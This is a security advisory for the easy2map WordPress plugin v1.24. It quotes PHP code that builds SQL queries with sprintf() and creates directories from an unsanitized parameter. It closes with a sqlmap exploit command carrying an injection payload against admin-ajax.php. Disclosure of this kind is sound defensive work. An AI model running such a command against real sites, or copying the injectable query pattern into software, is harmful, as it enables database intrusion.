Title: SQL Injection in easy2map wordpress plugin v1.24 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.25 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=131 Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity. Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 90 $wpdb->query(sprintf("UPDATE $mapsTable 91 SET PolyLines = '%s' 92 WHERE ID = '%s';", $PolyLines, $mapID)); . . . 163 $wpdb->query(sprintf(" 164 UPDATE $mapsTable 165 SET TemplateID = '%s', 166 MapName = '%s', 167 Settings = '%s', 168 LastInvoked = CURRENT_TIMESTAMP, 169 CSSValues = '%s', 170 CSSValuesList = '%s', 171 CSSValuesHeading = '%s', 172 MapHTML = '%s', 173 IsActive = 1, 174 ThemeID = '%s' 175 WHERE ID = %s;", 176 $Items['mapTemplateName'], 177 $Items['mapName'], 178 urldecode($Items['mapSettingsXML']), 179 urldecode($Items["mapCSSXML"]), 180 urldecode($Items["listCSSXML"]), 181 urldecode($Items["headingCSSXML"]), 182 urldecode($Items["mapHTML"]), 183 $Items['mapThemeName'], 184 $mapID)); 185 } else { 186 187 //this is a map insert 188 if (!$wpdb->query(sprintf(" 189 INSERT INTO $mapsTable( 190 TemplateID, 191 MapName, 192 DefaultPinImage, 193 Settings, 194 LastInvoked, 195 PolyLines, 196 CSSValues, 197 CSSValuesList, 198 CSSValuesHeading, 199 MapHTML, 200 IsActive, 201 ThemeID 202 ) VALUES ('%s', '%s', '%s', '%s', 203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');", 204 $Items['mapTemplateName'], 205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png", 206 urldecode($Items['mapSettingsXML']), '', 207 urldecode($Items["mapCSSXML"]), 208 urldecode($Items["listCSSXML"]), 209 urldecode($Items["headingCSSXML"]), 210 urldecode($Items["mapHTML"]), 211 $Items['mapThemeName']))) . . 267 $wpdb->query(sprintf(" 268 UPDATE $mapsTable 269 SET MapName = '%s', 270 LastInvoked = CURRENT_TIMESTAMP, 271 IsActive = 1 272 WHERE ID = %s;", $mapName, $mapID)); In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory: 4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/"; . . 11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) { 12 13 if (!file_exists($imagesDirectory)) { 14 mkdir($imagesDirectory); 15 } CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug) OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3